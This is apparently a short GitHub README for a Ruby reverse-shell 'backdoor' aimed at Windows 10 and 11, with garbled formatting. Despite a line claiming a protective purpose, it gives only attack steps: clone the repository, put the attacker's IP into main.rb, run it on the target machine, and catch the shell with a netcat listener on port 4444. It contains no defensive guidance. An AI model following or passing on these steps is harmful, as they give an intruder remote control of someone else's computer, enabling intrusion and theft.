A simple ruby reverse-shell windows 10, 11
My goal with this is not to black hat and throw around something that will screw someone is literally the opposite is to help you protect yourself
- Latest
Rubyversion.
Clone the repository using:
git clone https://github.com/DioBruh/backdoor-windows
Export attacker ip in main.rb
RHOST = '' # Hacker ip.If you don't know your ip, use:"
ifconfig- Init
archivemain.rb on target machine. - Start a
listenon your pc listening to port 4444 with the commandnc -lvnp 4444 - Wait for
connection.
|
Dio Brando |

